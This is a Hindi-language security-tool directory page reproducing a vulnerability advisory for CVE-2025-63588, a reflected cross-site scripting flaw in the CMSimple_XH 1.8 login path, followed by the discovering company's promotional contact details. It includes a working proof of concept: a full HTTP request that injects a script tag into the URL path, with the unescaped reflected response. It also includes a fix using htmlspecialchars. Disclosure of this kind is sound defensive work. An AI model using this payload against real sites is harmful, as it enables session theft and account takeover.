Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-63588 | Kitploit
उपकरण/GitHubGitHub/cybercrewinc/cve-2025-63588
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcybercrewinc/cve-2025-63588

CVE-2025-63588

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-63588 CMSimple_XH cmsimplexh पथ हैंडलिंग में परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS)

अनुमानित CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (मध्यम) निर्धारित CVE: CVE-2025-63588
उत्पाद: CMSimple_XH - 1.8 विक्रेता: CMSimple_XH - https://www.cmsimple-xh.org/

सारांश

CMSimple_XH के फ्रंट-राउटर पार्सिंग कोड में एक परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है जो डायनेमिक लॉगिन-संबंधित इनपुट को संभालता है। एप्लिकेशन अनुरोध URI से प्राप्त हमलावर-नियंत्रित डेटा को उचित आउटपुट एन्कोडिंग के बिना सीधे उत्पन्न HTML में (उदाहरण के लिए फ़ॉर्म action विशेषताओं और एंकर hrefs में) प्रतिबिंबित करता है। एक हमलावर ऐसा URL तैयार कर सकता है जिसे पीड़ित द्वारा खोले जाने पर, कमजोर साइट के संदर्भ में पीड़ित के ब्राउज़र में मनमाना JavaScript निष्पादित हो जाता है।

यह एक परावर्तित XSS (गैर-स्थायी) है; शोषण के लिए पीड़ित का निर्मित लिंक पर क्लिक करना आवश्यक है। विक्रेता को सूचित कर दिया गया है और इस समस्या का दस्तावेजीकरण कर ऊपर दिया गया CVE निर्धारित किया गया है।

प्रभाव

  • क्लाइंट-साइड कोड निष्पादन — साइट के संदर्भ में मनमाना JavaScript चल सकता है।
  • सूचना का खुलासा — स्क्रिप्ट DOM सामग्री और क्लाइंट-सुलभ कुकीज़ या टोकन पढ़ सकती हैं। यदि सत्र कुकीज़ HttpOnly सेट नहीं हैं, तो सत्र टोकन चुराए जा सकते हैं।
  • सत्र अपहरण / प्रतिरूपण — टोकन का बहिर्गमन पीड़ित के विशेषाधिकारों के आधार पर खाता अधिग्रहण की अनुमति दे सकता है।
  • फ़िशिंग / UI स्पूफ़िंग / बलपूर्वक कार्रवाइयाँ — इंजेक्टेड स्क्रिप्ट नकली UI बना सकती हैं, उपयोगकर्ता को पुनर्निर्देशित कर सकती हैं, या पीड़ित के सत्र के अंतर्गत कार्रवाइयाँ सबमिट कर सकती हैं।

प्रभावित घटक

यह भेद्यता फ्रंट राउटर / index.php (या समकक्ष फ्रंट कंट्रोलर) कोड से उत्पन्न होती है जो डायनेमिक पथ खंडों को पार्स करता है और उन्हें पेज/टेम्पलेट चर में मैप करता है। रॉ पथ खंड (CMSimple_XH के राउटर द्वारा उपयोग किया जाने वाला ?Templates... शैली का खंड) बिना उचित HTML विशेषता एन्कोडिंग या सैनिटाइज़ेशन के पेज टेम्पलेट्स में पारित किए जाते हैं और HTML विशेषताओं में इंजेक्ट किए जाते हैं, जिससे इंजेक्टेड <script> टैग या अन्य पेलोड शब्दशः रेंडर हो सकें। इसी तरह की परावर्तित XSS समस्याएँ अन्य वेब घटकों के लिए भी प्रकाशित की गई हैं और ये आमतौर पर अविश्वसनीय इनपुट की अनुचित आउटपुट एन्कोडिंग के कारण होती हैं।

प्रमाण-अवधारणा (PoC)

यह PoC हमलावर द्वारा प्रदत्त इनपुट के लौटाए गए HTML में प्रतिबिंबन को प्रदर्शित करता है, जो पीड़ित के ब्राउज़र में निष्पादित होगा।

अनुरोध:

root@kitploit:~
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45

login=true&keycut=z9U%21q2k%21F0&submit=Login
Pasted image 20251006200014

प्रतिक्रिया:

root@kitploit:~
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
Pasted image 20251006200122

जब पीड़ित का ब्राउज़र इस पृष्ठ को रेंडर करता है, तो इंजेक्टेड <script>alert(1)</script> निष्पादित हो जाता है। Pasted image 20251006204432 Pasted image 20251006204517

एक्शन विशेषता को सुरक्षित रूप से आउटपुट करने हेतु सुझाया गया PHP उदाहरण:

root@kitploit:~
$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';

श्रेय

श्रेय

निर्धारित CVE:** CVE-2025-63588

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

खोजकर्ता:株式会社CyberCrew / サイバークル

संदर्भ

https://github.com/cmsimple-xh/cmsimple-xh/releases https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ संपर्क

यदि आपके कोई प्रश्न या परामर्श हों, तो कृपया बेझिझक संपर्क करें।


🏢 株式会社CyberCrew

G1@4x

📞 Tel: 03-6853-5823
📧 Mail:[email protected]


📄 कंपनी विवरण

आइटमविवरण
कंपनी का नाम株式会社CyberCrew
पता東京都千代田区外神田1-18-13 秋葉原ダイビル6階

🔐 मुख्य सेवाएँ

🛡️ सुरक्षा ऑडिट और जोखिम मूल्यांकन

संगठन की कमजोरियों का बहुआयामी विश्लेषण कर सर्वोत्तम सुधार उपाय सुझाए जाते हैं।

💻 पेनेट्रेशन परीक्षण

लक्षित, परिदृश्य-आधारित और LLM पेंटेस्ट तक समर्थित।

🌒 डार्क वेब निगरानी

गोपनीय जानकारी के लीक का शीघ्र पता लगाकर त्वरित कार्रवाई की जाती है।

🎯 रेड टीम अभ्यास और सोशल इंजीनियरिंग

व्यावहारिक हमले के परिदृश्यों पर आधारित रक्षा क्षमता का मूल्यांकन किया जाता है।

🧠 सुरक्षित सिस्टम डिज़ाइन और परामर्श

विकास के आरंभिक चरण से ही सुरक्षा पर विचार करने वाले डिज़ाइन में सहायता प्रदान की जाती है।


🌐 आधिकारिक वेबसाइट:https://www.cybercrew.co.jp
🕒 CyberCrew — आपका विश्वसनीय सुरक्षा साझेदार।

टूल डाउनलोड करें